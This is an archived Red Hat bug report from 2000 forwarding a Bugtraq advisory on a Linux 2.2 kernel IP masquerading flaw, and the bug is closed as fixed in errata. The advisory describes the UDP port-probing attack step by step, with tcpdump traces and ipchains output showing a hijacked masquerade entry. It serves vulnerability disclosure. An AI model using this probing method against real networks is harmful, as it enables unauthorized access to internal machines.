Bug 10439 - ip masquerading vulnerability
ip masquerading vulnerability
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: kernel (Show other bugs)
6.0
All Linux
medium Severity medium
: ---
: ---
Assigned To: Michael K. Johnson
:
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2000-03-30 09:10 EST by smedina
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2000-05-22 11:40:33 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description smedina 2000-03-30 09:10:49 EST
The purpose of this email is twofold: 1) to inform you of a reported
vulnerability by a third party, not myself,  involving one of your
products, and 2) to obtain confirmation/clarification and knowledge of any
measures taken to address this in the event it is viable.

Below is the report (snipped):

--- Begin report ---

Multiple Linux Vendor 2.2.x Kernel IP Masquerading Vulnerabilities

bugtraq id 1078 class Access Validation Error cve GENERIC-MAP-NOMATCH
remote Yes local No published March 27, 2000 updated March 29, 2000
vulnerable Debian Linux 2.2pre potato
Debian Linux 2.2
Debian Linux 2.1
Linux kernel 2.2.14
Linux kernel 2.2.12
Linux kernel 2.2.10
RedHat Linux 6.2i386
RedHat Linux 6.1 sparc
RedHat Linux 6.1 i386
RedHat Linux 6.1 alpha
RedHat Linux 6.0 sparc
RedHat Linux 6.0 i386
RedHat Linux 6.0 alpha

A serious vulnerability exists in the IP Masquerading code present in, but
not necessarily limited to, the 2.2.x Linux kernel. Due to poor checking
of connections in the kernel code, an attacker can potentially rewrite the
UDP masquerading entries, making it possible for UDP packets to be routed
back to the internal machine.

The IP masquerading code only uses destination ports to determine if a
packet from the external network is to be forwarded to the internal
network. It then sets the remote host and port in its tables to the source
address and port of the incoming packet. The attacker needs to determine
the local port on the masq gateway to be able to rewrite the table with
their own address and port. As the range of ports used to masquerade
connections is small, from 6100 to 65096 for both UDP and TCP, it becomes
fairly easy for an external host to determine the ports in use. From the
Bugtraq post example section:

"We know that example.com has a linux masquerading gateway and that their
DNS server is outside of this firewall. We can come to the conclusion
that internal machines must be able to contact the external DNS server
to be able to access the internet. We start sending our probe packets:

Host A is our internal workstation (192.168.1.100)
Host B is our masq gateway (192.168.1.1 / 10.0.0.1)
Host C is the DNS server (10.0.0.25)
Host X is the attacker (10.10.187.13)

ipchains -L -M -n on the masq gateway BEFORE the probes
> UDP 03:39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53


[ tcpdump from attacker's machine ]

( we picked source port 12345 for our packets just so the trace would be
easier to follow)

[ snip -- this starts at port 61000 ]

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos
0xd8] (ttl 245, id 13135)
10.10.187.13.12345 > 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, id
23069)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos
0xd8] (ttl 245, id 13136)
10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id
23070)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos
0xd8] (ttl 245, id 13137)
10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id
23071)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos
0xd8] (ttl 245, id 13138)
10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id
23074)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos
0xd8] (ttl 245, id 13139)
10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id
23083)

10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos
0xd8] (ttl 244, id 17205)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
The above packet's ID is substantially different, we may have found a
masq'd connection !!!

10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id
23084)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos
0xd8] (ttl 245, id 13140)
10.10.187.13.12345 > 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id
23088)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos
0xd8] (ttl 245, id 13141)
10.10.187.13.12345 > 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id
23090)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63770 unreachable [tos
0xd8] (ttl 245, id 13142)
10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id
23091)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos
0xd8] (ttl 245, id 13143)
10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id
23092)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos
0xd8] (ttl 245, id 13144)

[ snip -- all the way to the upper end of our masq ports ]
ipchains -L -M -n on the masq gateway AFTER the probes
> UDP 04:35.12 192.168.1.100 10.10.187.13 1035 (63767) -> 12345
^-------[ expiration of the udp tunnel has been updated ;)

w00t! We now have a working tunnel from our host to port 1035 on the
inside machine!

A possible workaround is to place a caching nameserver on the masquerade
machine, and disable masquerading of UDP packets


--- End report ---


An explanation of my query - I work for Infrastructure Defense, Inc.,
which provides private publications to fortune 500 companies about
information/computer security trends, vulnerabilities, etc. I strive to
contact the appropriate parties whenever there is a question as to the
veracity of a post, claim, other. Hence, my email to you.

I hope to hear from you soon.


Servio Medina - smedina@idefense.com
Information Security Analyst
www.idefense.com
Comment 1 Cristian Gafton 2000-05-22 11:40:59 EDT
assigned to dledford
Comment 2 Pekka Savola 2000-07-14 20:04:34 EDT
This was fixed in errata release, 2.2.14-12.

Note You need to log in before you can comment on or make changes to this bug.